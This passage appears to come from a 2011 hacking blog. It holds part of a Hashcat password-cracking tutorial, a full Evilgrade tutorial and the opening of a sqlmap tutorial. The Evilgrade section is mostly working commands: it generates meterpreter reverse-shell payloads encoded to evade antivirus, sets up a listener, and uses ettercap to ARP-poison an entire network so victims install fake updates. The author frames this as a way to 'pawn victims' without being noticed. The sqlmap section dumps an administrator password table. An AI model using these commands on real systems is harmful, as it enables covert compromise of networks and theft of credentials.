I advise reviewing the Hashcat site for rules files as they can be used to manipulate your wordlist and make them exponentially more valuable and effective. They also can allow you to manipulate a wordlist as defined by the rule set used. You can use this to get the same affects as the Toggle-Case, Permutations, Combination, as well as custom ones like adding 2011 to the end or beginning of each word, or maybe in the middle instead. These types of things can all be defined in the rules and then loaded in to modify your wordlist on the fly. I generally run the "Straight" words attack mode and then roll through all of my rules I have setup one by one with a much higher rate of effectiveness.

Here are some possible charsets you might want to try out if you will be Bruteforcing your way to victory. Just keep in mind how they can impact time it might take to crack cycling through all possible combinations and also why it important to keep a secure password:

· 0123456789

o 3628800 Possible Combinations

· abcdefghijklmnopqrstuvwxyz

· ABCDEFGHIJKLMNOPQRSTUVWXYZ

o 403291461126605635584000000 Possible Combinations

· !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

· abcdefghijklmnopqrstuvwxyz0123456789

· ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

o 3.7199332678990121746799944815084e+41 Possible Combinations

· ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

· abcdefghijklmnopqrstuvwxyz0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

o 2.4800355424368305996009904185692e+96 Possible Combinations

· abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789

· abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

o 1.0873661566567430802736528525679e+146 Possible Outcomes

NOTE: Possible combinations can be derived using factorial functions: x! Where x = number of characters available to use, hence:

· 0123456789 - 10! OR 10 x 9 x 8 x 7 x 6 x 5 x 4 x 3 x 2 x 1 = 362800 Possible Combinations

That is all the math I will bore you with for now, sorry but thought someone out there might find this interesting. Once you have identified the method that works best for you simply setup all the options and point everything to the correct files and if you have elected to have the cracked hashes removed then you might want to also check the Output "Write recovered hashes to file" and point it to where you want the output to go to. It will create a new file if needed, and will share nicely with the other tabs if you decide to use one file for all of your outputs, you can also play with the output formatting as well to put in form of HASH:PASS or HAHS:HEX_PASS or HAHS:PASS:HEX_PASS.

TRICK: If you have want to take the found passwords form the output file and add them to the word list you can write your own batch script or Perl script to remove the hash from prefix using the "hash list separator" as your indicator mark to stop removing items from each line. If that doesn’t work you can copy and paste the list online here: http://www.md5decrypter.co.uk/list-tool.aspx. You can identify your hash list separator on the right hand side and then let it run. It will allow you to split the list into a separate hash file and a separate password file, which you can then add to your word list or manage as needed. See screenshot below:

Everything so far relates to the main tab for Hashcat which relies on CPU power. This can be fine if you have a simple rule set or a small word list, but can take centuries if you have a rather complex rule set and a really large word list. For example, I am running this with the latest i7 core processor and can get speeds up at about 56 Million words a second which may take around 13 Hours if I let it go non-stop at an 8 character password with the "abcdefghijklmnopqrstuvwxyz0123456789" charset. If I wanted to start testing longer password possibilities or larger charsets it would start growing exponentially and would become unrealistic after a while. This is where it is handy to upgrade your motherboard with a few video cards and start putting them to use in cracking. The GPU cores can be used to help out the job and can achieve insanely high pass through rates. If we run the same bruteforce attack using my two GPU enabled cards (450GTS & 580GTX-ti) I can speed things up to about 800 Million Passwords a second to speed the attack time from ~13 hours to just under an hour. This makes a HUGE difference in completion time!!!

Let us now review the three (3) different GPU tools available and how and when to use them: oclHashcat/cudaHashcat, oclHashcat-plus/cudaHashcat-plus, and oclHashcat-lite/cudaHashcat-lite.

cudaHashcat/oclHashcat (Tab2):

There is cudaHashcat/oclHashcat which can be used for BruteForcing MD5, MD4, NTLM, DCC, SHA-1, and MySQL hashes. It is handy for bruteforcing a Large Hash list after exhausting all of your dictionaries. It also has the ability to apply rules to either side of the password combinations being tried (left vs. right side). This tool will take the default built in charsets or customer user defined charsets and will run much faster than any CPU bruteforce attempts. You can define the charset to use by using the mask feature and identifying the number of characters to use. You would need to define 4 on one side and 4 on the other to try all possibilities for 8 character hash. Here is a overview of what can be used to define how you want to perform this hybrid attack:

· ?l = lowercase alpha (abcdefghijklmnopqrstuvwxyz)

· ?u = uppercase alpha (ABCDEFGHIJKLMNOPQRSTUVWXYZ)

· ?d = numerical digits (0123456789)

· ?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~

· ?h = ISO-8859 characters from 0xc0 - 0xff

· ?D = 8bit characters from German alphabet

· ?F = 8bit characters from French alphabet

· ?R = 8bit characters from Russian alphabet

· ?1 = number one - use custom charset 1 (uses whatever you copy into the empty field)

· ?2 = number two - use custom charset 2

· ?3 = number three - use custom charset 3

· ?4 = number four - use custom charset 4

?l?l?l?l ?l?l?l?l would define a password of 8 characters in length using all lowercase alphabet as charset to try all possibilities: aaaaaaaa-zzzzzzzz.

The custom charset can be used as needed, but I find them helpful to add specific combinations to the end or beginning of the passwords being used in the word list, for example you could define custom1 as 1, custom2 as 2, custom3 as 3, and custom4 as 4 and to define the last 4 characters as 1234, which depending on your placement can create a whole new dictionary. I have found ending with 123 has very high success rates on real life samples.

?l?l?l?l ?1?2?3?4 would define a password of 8 characters and would fix 1234 as the last four characters of each password attempted, from aaaa1234-zzzz1234. Hopefully you can see how this can be helpful when all dictionary attempts have been exhausted and/or you have some helpful information to help you narrow down the possibilities to be used - since you can define the placement and characters to be used in the attempts.

If you decide to use a dictionary instead of masks you can also combine rules to them as well on a left and right side basis, same as masks and custom charsets above, just fill out the details for the mandatory fields. I tend to reserve my dictionaries for the next tab though, so I will not cover that part here. The last thing to complete before running the GPUs at things is the Resources section. You will need to define the GPU(s) to be used. If they are all the same type then do nothing and it will use them all together, however if you have a mix match of cards like I do (due to budget reasons) then you can simpy define them using comma separated values. I use two different cards and it will only use one by default so I change the GPU devices to state "1,2" to instruct it to use both GPU #1 and GPU #2. You will find better results if you run the same type of cards, but this is a perfectly acceptable and working alternative for those that grow on a budget or over time. If you do a little research or are more familiar with your GPU then you can tweak your heart out with the workload tuning and GPU loops but the defaults will be fine for the average users. Finally choose to write your output file to where you want in the desired format and you can start the GPU attacks on your hash list. You will notice the command used is also displayed next to the start button if you want to learn the commands to do things from the console. This is also very helpful if you pause an attack and need to pick things up later, as the commands can be rather long and you can simply copy and paste it to where you need it. Once you hit start the command prompt should open and show the running status, you can the "S" button to show the status at any given time.

oclHashcat-plus/cudaHashcat-plus (tab3):

This was also formerly known as oclHashcat+/cudaHashcat+ and has recently been changed to the new name. This GPU tool is used to replace the outdated CPU cracker that we originally all came to love and known as Hashcat, and is very good for single or large lists of MD5, MD4, NTLM, DCC, and DES hashes. This takes your Dictionary and Password files and runs the same attacks on them that Hashcat would, but instead of using the CPU it uses the GPU power, which results in exponentially faster results.

Like on tab1 for Hashcat we will need to point it to our Hash list file, choose to remove cracked hashes or not, point it to your dictionary or password files (as many as you have or need - haven't hit the limit yet), identify hash type. Now you can’t choose attack modes here but you can point it at your rules files which will do way more than the default attack modes will ever do, so not much loss here. If you want to let the tool auto-generate rules based on the developer’s statistical analysis you can do that as well and define how many rules to generate. As done on the oclHashcat/cudaHashcat you will need to define your GPU cards to use in the attack if they are not of the same kind and adjust any of the other parameters if you are advanced enough to know what you are doing. Choose to write the output and format type if desired and that is it. As before it will open the command prompt for you and start running the dictionary attacks off the GPU devices identified.

Once it is running it will look similar to before, and you can use the "S" for up to date status check, "h" for help dialogue, or "q" to quit:

oclHashcat-lite/cudaHashcat-lite (tab4):

This GPU tool is a bit more precise and can only be used on a single hash at a time, but is capable of cracking MD5, SHA-1,MySQL > 4, NTLM< and Domain Cached Credentials (DCC) hashes at extremely fast rates.

This can be very handy when you have a high priority hash and want to focus everything you have on it to Bruteforce it. You will also need to define the mask to use if desired or you can simple provide the charset to use and the min and max parameters for password length. You can also instruct the tool to take charset in hex form by checking the available box.

As done for the previous tabs you will need to identify your GPU devices and tweak any advanced parameters you want. Lastly identify if you want to write the output to file and where and you are ready to fire away.

This completes the overview and review of the latest release from the Hashcat team for Hashcat-GUI-v0.4.2. I hope you have enjoyed this review and I hope you find this tool very useful in your hash cracking adventures. If you want to speed things up you can also run one attack from the GPU tools while simultaneously running an attack from the CPU powered Hashcat tab. I use this method regularly to allow the CPU to handle the small rule sets I have and let the more complex rules run through the GPU to save time. You can also let Bruteforcing of smaller length attempts run on CPU while running anything over 7 characters long on the GPUs to save yourself some time. Enjoy and follow up with the makers of the tool as it is being updated all the time and they never seem to stop amazing me. If you have a small problem or need some help please feel free to comment or drop me a line and I will do what I can to help out with GUI or console problems. This was not meant to be an end all be all of tutorials or overview, but I do think it is very helpful and quite amazing tool and wanted to share it with the world. Have fun cracking...

UPDATE - Here is the video I made to accompany the article above:

FREE PROXIES PAGE ADDED

2011-06-02T08:03:00.001-05:00

Hey Folks, I have added a whole new page dedicated to free elite and anonymous proxies. I will be updating it weekly to keep it fresh and useful for any one that wants to use it. It can be found via the link below the page header. Hope you appreciate this service and find it usefull. If so make sure to leave a comment or two and let me know.

SILENTLY Owning the Network with ISR EVILGRADE

2011-05-18T18:42:00.000-05:00

Evilgrade is a modular framework designed to take advantage of HD Moore & Dan Kaminsky's DNS exploits in tandem with insecure application update mechanims to inject and execute Meterpreter shells or your RAT amlost entirely SILENT on fully patched Windows and OSX machines. This tool works by using man-in-the-middle techniques (DNS, ARP, DHCP, etc) to exploit a wide variety of applications. Today I am going to show you the basics of how to get it it properly installed and setup as well as how to use it to pull of some really amazing techniques to pawn victims on your network (WLAN & LAN only folks). Before we begin I should point out that I will be performing this on the new BT5 platform (GNOME edition) as it already comes with Metasploit, and other tools needed to pull off MiTM attacks. You will also need to download a copy of Evilgrade to your BT5 Desktop, which can be downloaded from homepage found at the following location: http://www.infobyte.com.ar/developments.html
(just click on download link in bottom right). This tutorial will be done almost entirely from the command prompt, so please dont ask why you couldn't double click point and shoot to make it work. I will classify this one as Intermediate in nature as it is all from command line and requires some initial steps to get it working. If you are at all familiar with working on Cisco Routers or other IOS type CLI environments then this will be a piece of cake. Let's begin, try to keep up...

You will need to start by extracting Evilgrade once it has been downloaded from the homepage, for this you can use the following commands:

Commands: tar -zxvf
root@bt:~/Desktop/EvilGrade2.0# tar -zxvf isr-evilgrade-2.0.0.tar.gz
      NOTE: you can add the -C argument followed by the path if you want to extract it
      to another location other than where it is sitting after it was downloaded
              EX: root@bt:~/Desktop/EvilGrade2.0# tar -zxvf isr-evilgrade-2.0.0.tar.gz
              -C /pentest/exploits/ISR

Now you will have a new folder called "isr-evilgrade" either in the default location on your desktop or where you told it to go with the -C argument noted above. Navigate to this folder and you can start it up...maybe. By default Backtrack does not have all of the underlying Perl modules needed for the framework to work, so we will need to make some quick additions to instlal those dependencies, as follows:

You can try to start Evilgrade to check byu simply entering the following at commadn prompt and hitting enter: ./evilgrade
If you are using a fresh BT 5 install then you will get the following results:
root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade# ./evilgrade
Can't locate Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.
BEGIN failed--compilation aborted at isrcore/Shell.pm line 28.
Compilation failed in require at (eval 2) line 3.
...propagated at /usr/share/perl/5.10/base.pm line 93.
BEGIN failed--compilation aborted at isrcore/shellz.pm line 29.
Compilation failed in require at ./evilgrade line 24.
BEGIN failed--compilation aborted at ./evilgrade line 24.

Take note of the dependency missing above (Data/Dump.pm). EvilGrade requires the following perl modules to work 100%: Data::Dump, Digest::MD5, and Time::HiRes
      For BackTrack5 we will need to install Data::Dump, and to do this you
      can use the following commands:

Command to search for package: apt-cache search perl <insert package name looking for>
     EX: apt-cache search perl Data::Dump
          NOTE: the package name usually starts with lib and ends with -perl, like:
          libsomething-perl, and results should provide basic description as well
                  What we need: libdata-dump-perl - Perl module to help dump data structures
Command to Install the package (using name found above): apt-get install <package name>
     EX: ap-get install libdata-dump-perl

Once this is installed you should be able to re-check to see if anything else is needed (nothing else is needed for BT5, but if you are using BT4 you might also have to install one of the other two dependecies listed above). We can re-check by simply typing the following:

Command: ./evilgrade
Results this time around:
root@bt:~/Desktop/EvilGrade2.0/isr-evilgrade# ./evilgrade
[DEBUG] - Loading module: modules/cygwin.pm
[DEBUG] - Loading module: modules/virtualbox.pm
[DEBUG] - Loading module: modules/sparkle.pm
[DEBUG] - Loading module: modules/clamwin.pm
[DEBUG] - Loading module: modules/ccleaner.pm
[DEBUG] - Loading module: modules/miranda.pm
[DEBUG] - Loading module: modules/notepadplus.pm
[DEBUG] - Loading module: modules/amsn.pm
[DEBUG] - Loading module: modules/winzip.pm
[DEBUG] - Loading module: modules/istat.pm
[DEBUG] - Loading module: modules/linkedin.pm
[DEBUG] - Loading module: modules/flip4mac.pm
[DEBUG] - Loading module: modules/photoscape.pm
[DEBUG] - Loading module: modules/jet.pm
[DEBUG] - Loading module: modules/getjar.pm
[DEBUG] - Loading module: modules/superantispyware.pm
[DEBUG] - Loading module: modules/dap.pm
[DEBUG] - Loading module: modules/filezilla.pm
[DEBUG] - Loading module: modules/allmynotes.pm
[DEBUG] - Loading module: modules/panda_antirootkit.pm
[DEBUG] - Loading module: modules/sunjava.pm
[DEBUG] - Loading module: modules/cpan.pm
[DEBUG] - Loading module: modules/freerip.pm
[DEBUG] - Loading module: modules/autoit3.pm
[DEBUG] - Loading module: modules/apt.pm
[DEBUG] - Loading module: modules/googleanalytics.pm
[DEBUG] - Loading module: modules/opera.pm
[DEBUG] - Loading module: modules/gom.pm
[DEBUG] - Loading module: modules/techtracker.pm
[DEBUG] - Loading module: modules/yahoomsn.pm
[DEBUG] - Loading module: modules/nokia.pm
[DEBUG] - Loading module: modules/appleupdate.pm
[DEBUG] - Loading module: modules/growl.pm
[DEBUG] - Loading module: modules/bbappworld.pm
[DEBUG] - Loading module: modules/atube.pm
[DEBUG] - Loading module: modules/nokiasoftware.pm
[DEBUG] - Loading module: modules/skype.pm
[DEBUG] - Loading module: modules/apptapp.pm
[DEBUG] - Loading module: modules/vidbox.pm
[DEBUG] - Loading module: modules/isopen.pm
[DEBUG] - Loading module: modules/winupdate.pm
[DEBUG] - Loading module: modules/jetphoto.pm
[DEBUG] - Loading module: modules/trillian.pm
[DEBUG] - Loading module: modules/openoffice.pm
[DEBUG] - Loading module: modules/mirc.pm
[DEBUG] - Loading module: modules/ubertwitter.pm
[DEBUG] - Loading module: modules/orbit.pm
[DEBUG] - Loading module: modules/osx.pm
[DEBUG] - Loading module: modules/bsplayer.pm
[DEBUG] - Loading module: modules/sunbelt.pm
[DEBUG] - Loading module: modules/quicktime.pm
[DEBUG] - Loading module: modules/flashget.pm
[DEBUG] - Loading module: modules/fcleaner.pm
[DEBUG] - Loading module: modules/express_talk.pm
[DEBUG] - Loading module: modules/divxsuite.pm
[DEBUG] - Loading module: modules/speedbit.pm
[DEBUG] - Loading module: modules/paintnet.pm
[DEBUG] - Loading module: modules/itunes.pm
[DEBUG] - Loading module: modules/teamviewer.pm
[DEBUG] - Loading module: modules/winscp.pm
[DEBUG] - Loading module: modules/vmware.pm
[DEBUG] - Loading module: modules/blackberry.pm
[DEBUG] - Loading module: modules/winamp.pm
                _ _                             _
               (_) |         _               | |
    _____     | ___| | __ _ _ _| | ___
/ _ \ \ / / | |/ _` | '__/ _` |/ _` |/ _ \
| __/\ V /| | | (_| | | | (_| | (_| |   |__/
\___| \_/ |_|_|\__, |_| \__,_|\_,_|\___|
                     __ / |
                    |___/
-------------------------------------------
--------------------- http://www.infobytesec.com/
- 63 modules available.
evilgrade>....
Now that we have it running what next you might be asking? Let's start by seeing what all is available when we begin, start by simply typing in "help"...
Results...
evilgrade>help
Type 'help command' for more detailed help on a command.
Commands:
    configure - Configure <module-name> - no help available
    exit      - exits the program
    help      - prints this screen, or help on 'command'
    reload    - Reload to update all the modules - no help available
    restart   - Restart webserver - no help available
    set       - Configure variables - no help available
    show      - Display information of <object>.
    start     - Start webserver - no help available
    status    - Get webserver status - no help available
    stop      - Stop webserver - no help available
    version   - Display framework version. - no help available
    vhosts    - Show vhosts enable - no help available

We can check what modules are available to see what types of SW we can target by using the "show modules" command from the evilgrade command prompt.
Results...from: evilgrade>show modules
List of modules:
===============
allmynotes
amsn
appleupdate
apptapp
apt
atube
autoit3
bbappworld
blackberry
bsplayer
ccleaner
clamwin
cpan
cygwin
dap
divxsuite
express_talk
fcleaner
filezilla
flashget
flip4mac
freerip
getjar
gom
googleanalytics
growl
isopen
istat
itunes
jet
jetphoto
linkedin
miranda
mirc
nokia
nokiasoftware
notepadplus
openoffice
opera
orbit
osx
paintnet
panda_antirootkit
photoscape
quicktime
skype
sparkle
speedbit
sunbelt
sunjava
superantispyware
teamviewer
techtracker
trillian
ubertwitter
vidbox
virtualbox
vmware
winamp
winscp
winupdate
winzip
yahoomsn
- 63 modules available.

As you can see there are a lot of modules available and I assure you that you can find many of these on almost any PC (lots of times more than one). Now you will need to identify which one you want to work with. Most of the demos provided by the creators of this cool tool show the "sunjava" module being used, so I thought I would use something different, you can use what you want or what you know your target will have running. Once you have made up your mind about which module(s) we will use it is time to start setting things up. We will begin by letting Evilgrade know which module we want to use, like so:

Command: evilgrade>configure <insert module name you chose>
     EX: evilgrade>configure ccleaner

You will know you are in the chosen modules configuration mode, which is noticable as the command prompt will change and now appear as follows:

Results...from above: evilgrade>configure ccleaner...
evilgrade(ccleaner)>

OK so now to check what all is configurable for a chosen module. We can do this by simpy typing "show options" at the configuration level command prompt.

Results...
evilgrade(ccleaner)>show options
Display options:
===============
Name = Ccleaner
Version = 1.0
Author = ["German Rodriguez < grodriguez +[AT]+ infobytesec.com >"]
Description = ""
VirtualHost = "http://www.ccleaner.com/"
.---------------------------------------------------.
| Name   | Default                | Description     |
+--------+---------------------+-----------------+
| enable |                 1           | Status              |
| agent   | ./agent/agent.exe | Agent to inject |
'---------+---------------------+-------------------'
You can see that "VirtualHost" is set to http://www.ccleaner.com/, this is the virtual host the Evilgrade will impersonate once we get things running and start our MiTM attack. If you notice these have changed over time or you know of "secret" update servers you can simply edit this field to change.
       PRO-TIP: You can edit the perl modules in the "modules" folder within
       isr-evilgrade folder if you know what you are doing to edit the VirtualHost settings,
       but if you are not familiar with Perl then I dont suggest messing with these
       and simply leaving as default will do for most scenarios. These can also be
       studied to add in your own modules for other applications and some basic
      instructions can be found within the tools documentation and README file.

The AGENT field is the MOST IMPORTANT field we will be working ith for this tutorial as it will be our evil agent in disguise, it is the fake update binary. We have two options for setting up our agent in disguise:

OPTION 1: We can set up Evilgrade to work with Metasploit and msfpayload/msfencode to dynamically create payloads on the fly
OPTION 2: We can use our own RAT or backdoor to be uploaded to our victims.

We can accomplish either scenario using the "set" command and defining the AGENT field, by providing a path to Metasploit's msfpayload and msfencode OR by providing path directly to your RAT or backdoor.

Here is overview of both methods with examples so you can more clearly understand:

OPTION 1: let Metasploit helpout and generate payload on the fly
Command: evilgrade(ccleaner)>set agent '["/usr/local/bin/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 X > <%OUT%>/tmp/agent.exe<%OUT%>"]'
        NOTE: If you are not using BT5 just make sure the first part
        (/usr/local/bin/msfpayload) points to where the path variable is located so
        the framework can use it, as it BT4 it is located at /usr/bin/msfpayload.
                PRO-TIP: You can replace the above example using meterpreter reverse shell
               with your choice of the available payloads in Metasploit (of which there are many)
SUPER-PRO-TIP: If you want to avoid anti-virus from catching your agent due to Meterpreter being blasted all of the place, you can modify the above command to also encode the agent so it has a better chance of passing AV. Here is an example you can work with, note that msfencode only encodes RAW data so it needs to be RAW and then converted to binary EXE format to work (also why you cant just encrypt your standard RAT with msfencode)

EX: evilgrade(ccleaner)>set agent '["/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > <%OUT%>/tmp/agent.exe<%OUT%>"]'

In this case for every required update binary or victim request we get, the framework will generate a fake update binary using our dynamic link to MSF which will load a encoded Meterpreter reverse shell.

OPTION 2: Using our own RAT or backdoor with hard coded path to EXE. You will simply need to place your RAT or backdoor of choice in a designated folder and then tell the framework where to find it, it is as simply as this:

Command: evilgrade(ccleaner)>set agent /root/Desktop/server.exe
      NOTE: msfecode will not be able to help you FUD your payload if it
      is already in Binary EXE form, so make sure it is FUD to avoid any issues
     with AVs ahead of time

In this case for every required update binary or victim request we get, the framework will simpoly use your designated RAT/Backdoor to create the update agent

IMPORTANT NOTES: You will need to setup the "exploit/multi/handler" from within MSF console to monitor connections made from our Meterpreter Shell (if you are using your own RAT or Backdoor I will assume you know how to monitor for connections and successful uploads).

From MSF Console, type the following commands:
   use exploit/multi/handler
   set payload=windows/metepreter/reverse_tcp
   set LHOST=192.168.1.2
   set LPORT=31337
   Exploit

Results...
[*] Started reverse handler on 192.168.1.2:31337
[*] Starting the payload handler...

When we are done making our configuration changes we will simply enter the "conf" command to get out of configuration mode and back to initial command prompt, or as the authors call it Global Conifuration Mode. You can repeat the above steps for other modules to have more than one setup at once. We will also want to issue the "reload" command so that the framework will update all of the modules to include the updates we made above at the configuration level (for the module ccleaner in this example). Once that is done you can issue the "show active" commands to show the active modules you have configured.

Commands:
evilgrade(ccleaner)>conf
evilgrade>
evilgrade>reload

OK so we have configured our modules to reference the appropriate AGENT we want to use, now it is time to place the final edits and start things up...

From the Global Configuration Mode you will need to enter "show options" to see how Evilgrade is setup to act as DNS and Webserver as well as what ports it is working on.

Command: evilgrade>show options
Results...
Display options:
===============
.-------------------------------------------------------------------------------------------------------.
| Name               | Default   | Description                                                                         |
+------------------+-----------+---------------------------------------------------------------------+
| DNSEnable      |         1      | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip )                                                         |
| DNSPort          |        53     | Listen Name Server port                                                     |
| debug               |         1     | Debug mode                                                                        |
| port                  |        80     | Webserver listening port                                                     |
| sslport              |       443   | Webserver SSL listening port                                             |
'-------------------+-----------+---------------------------------------------------------------------'
As you can see we need to change a few things. We will need to change the "DNSAnswerIp" to point at our IP on the network, in this example 192.168.1.2.

Command: evilgrade> set DNSAnswerIp 192.168.1.2
Confirm with: evilgrade>show options
Result:
Display options:
===============
.----------------------------------------------------------------------------------------------------------.
| Name               | Default       | Description                                                                         |
+------------------+--------------+---------------------------------------------------------------------+
| DNSEnable      |         1         | Enable DNS Server ( handle virtual request on modules ) |
| DNSAnswerIp | 192.168.1.2 | Resolve VHost to ip )                                                         |
| DNSPort          |        53         | Listen Name Server port                                                     |
| debug               |         1          | Debug mode                                                                        |
| port                  |        80         | Webserver listening port                                                     |
| sslport              |       443        | Webserver SSL listening port                                             |
'-------------------+--------------+---------------------------------------------------------------------'

Starting, stopping and checking the status of Evilgrade is equally as easy. You simply issue "start", "stop", or ":restart" to do the obvious, and you can check the status of things by issuing the "status" command.
        NOTE: the "status" command will get information regarding the webserver
        and DNS server status (running or not) as well as any victim details)

Command: evilgrade>start
evilgrade>start
...
evilgrade>
[18/5/2011:15:34:4] - [WEBSERVER] - Webserver ready. Waiting for connections ...
evilgrade>
[18/5/2011:15:34:4] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
evilgrade>show status
Webserver (pid 666) already running
Users status:
============
.------------------------------------------------------------------------------------------------------------.
| Client              | Module                 |  Status | Md5,Cmd,File                                                 |
+----------- ----+----------------------+---------+------------------------------------------------------+
| 192.168.1.25   | modules::ccleaner | send    | MD5-Hash-Value,'',"./agent/agent.exe"          |
'------------------+-----------------------+--------+-------------------------------------------------------'
evilgrade>stop
Stopping WEBSERVER [OK]
Stopping DNSSERVER [OK]

OK so that is all there is to setting up Evilgrade! From here you just need to pull off a Man-in-the-Middle (MiTM) attack so you can start redirecting DNS traffic and then restart Evilgrade so it can work its magic. I suggest leaving Evilgrade running in one terminal window and opening another window up to pull off the MiTM attack. The MiTM attack has been well documented using all sorts of tools. Please read up on the various methods that can be used for this portion of the tutorial as there are many ways to go about doing this, but I will cover one basic example using Ettercap to redirect traffic on a specific target so you can complete our testing of this method without leaving you hanging.

Getting MiTM attack working so Evilgrade can do its thing - MiniTutorial:Open new terminal in BackTrack5 and type the following:
Command: ifconfig
      Take note of your IP address, default gateway and interface name
Command: nmap -sP 10.10.10.*
      This will perform a quick pin sweep of the network, you can change
      the 10.10.10.* to fit your need based on ifconfig results above (i.e. 192.168.1.*)
Command: echo 1 > /proc/sys/net/ipv4/ip_forward
      This ensures packet forwarding is turned on
           Confirm: cat /proc/sys/net/ipv4/ip_forward
                Result: should return a one (1) to indicate port forwarding is enabled
Command: ettercap -T -Q -M ARP -i eth0 /victim-ip/ /gateway-ip/ -l capturefile -P autoadd
-T starts ettercap in text mode
        NOTE: You could envoke ettercap with the -G argument only, to open the GTK GUI
        for ettercap and then pick and choose the plugins to use from the GUI (noobs)
-Q will make ettercap run in Quiet mode, and not print raw packets in the terminal window
        NOTE: if you want to see everything or to look cool just omit this flag
-M starts MiTM attack mode
        NOTE: You can combine all of the above into one argument to simplify
        things '-TQM' or separated individually
ARP is the type of poisoning we want to perform while in MiTM mode
-l capturefile tells ettercap to log captured data into file called "capturefile"
        NOTE: you can cahnge the capture file name to anything you want
             PRO-TIP: you can add more code to have this filtered on the fly for logins
             and credentials with minimal effort or you can sort through it offline later
             with Wireshark or your capture analysis tool of choice. It is also possible
             to add SSLstrip to the equation but you will need to figure that out as I
             dont have time to cover that here...
-P autoadd - is a way to tell ettercap to use the plugin autoadd, which as it sounds is a plugin that automaticlly adds hosts to the list after it is started in case any come online after it is initially started
        NOTE: you can add other plugins here or leave out entirely, it is up to you
-i eth0 specifies the network interface
/victim-ip/ is the ip address we want to affect, or in this case arp poison
        NOTE: you can leave simply as "//" to indicate you want to perform the task
        on the ENTIRE network
/gateway-ip/ is the ip address we want to use to essentially impersonate
        NOTE: this does not have to be the gateway, but in most cases this will have the best results.

EX: ettercap -TQM ARP // // -P autoadd
       This ARP poisins the whole network, adding any new hosts that show up late to our party ;)

If you fill in the /"victim-ip"/ and /"gateway-ip"/ and run this command it will start ARP poisoning all hosts on the network that you have identified. Once this is done Evilgrade will sart picking up the traffic and begin forging secret agents to pawn your victims. At this point just sit back and watch the sessions stack up in your multi-handler terminal (or wherever you view your connections for your RAT/Backdoor). You should remember to use the proper method to close ettercap so it properly restores the routing tables on the victims when you are done (just hit "q" in terminal screen while it is running and give it a second to shutdown)...you dont have to but it will go less noticed if you do.

Personal Note: I find it's also nice to save the iptables for future use. I suggest saving them before and reloading them once you are done and have ended all the stuff you have running;
Command: iptables-save <filename>
Command: echo 0 > /proc/sys/net/ipv4/ip_forward
      Confirm: cat /proc/sys/net/ipv4/ip_forward
           Result: should return a zero (0) to indicate port forwarding is turned off
           PRO_TIP: If you simply want to permanently set this to forward, you can
          edit the /etc/sysctl.conf file to uncomment the forwarding line
Command: iptables-restore <filename>

General Note: If you are performing this or any of the other steps in this tutorial on another Linux distro you may have to run "sudo" in front of all the commands to work, not in issue in Backtrack as you run as root by default. You can download ettercap using apt-get (apt-get install ettercap) if you need that as well.

I hope you have enjoyed this tutorial as I know I had fun documenting things to share with you, and remember to always be aware of your surroundings before you start clicking away and allowing things to do what they please. Do not put all your faith in a company name, and take off your auto-updaters or dont allow them to update unless you are on a secure network that you know is safe. Enjoy and stay tuned for more to come when I return in a few weeks....
Later,
H.R.

Owning the Database with SQLMAP and METASPLOIT

2011-05-17T23:38:00.000-05:00

Last time we were using SQLMAP from Windows platform and could not realize its full potential so today I will be trying to teach you how to use it from Linux platform to take advantage of all that it has to offer. We will begin by booting up our favorite Linux distro of choice; I will be using BackTrack 4R2 for purposes of this tutorial - it is not required but helps because everything is mostly setup already (mostly Metasploit). Once you have your networking services started and a confirmed working version of Metasploit installed you should have everything how you want it for a stable work environment we will begin by downloading the latest copy of SQLMAP to our system. You can find it online at: http://sqlmap.sourceforge.net/ or you can check it out from the terminal by using the following commands:

EX: svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

NOTE: if using svn you may need to accept certificate to download, this is safe so

you shouldnt have to worry...

Once it is done downloading you will have a new folder on your Desktop called "sqlmap-dev", and inside is what we will be using for the remainder of this tutorial - "sqlmap.py". In order to confirm it is properly setup lets just issue a quick command to take a peek at what we will be using today:

EX: python sqlmap.py --help

This will display all of the options available for SQLMAP. I will not go into too much details on the basics as they were covered in my first tutorial. I will be picking up where we left off in the previous tutorial, quick recap:

Command: python sqlmap.py -u http://site.com/example.php?id=1 -f -b --current-user --current-db --dbs --is-dba

Target Site: http://site.com/example.php?id=1

Current User: 'user@localhost'

Current Database: database1

System Users [1]: 'user'@'localhost'

Current User is DBA: 'False'

Available Databases [5]:

[*] information_schema

[*] database1

[*] database2

[*] database3

[*] database4

Command: python sqlmap.py -u http://site.com/example.php?id=1 --tables -D database1

Database: database1

[13 tables]

+-----------------+

| access |

| action |

| ad |

| adcriteria |

| adminhelp |

| administrator |

| adminlog |

| adminmessage |

| bbcode |

| config |

| db_users |

| users |

| etc |

+-----------------+

Command: python sqlmap.py -u http://site.com/example.php?id=1 --columns -D database1 -T administrator

Database: database1

Table: administrator

[3 Columns]

+----------+---------------+

| Column | Type |

+---------+----------------+

| user | varchar(250) |

| pass | varchar(250) |

| ID | int(11) |

| etc | varchar(100) |

+--------+-----------------+

Command: python sqlmap.py -u http://site.com/example.php?id=1 --dump -D database1 -T administrator -C ID,Password,user

Database: database1

Table: administrators

[2 entries]

+-----+------------------------------+------------+

| ID | Password | User |

+-----+------------------------------+------------+

| 1 | IhazYOURpassWORD | admin |

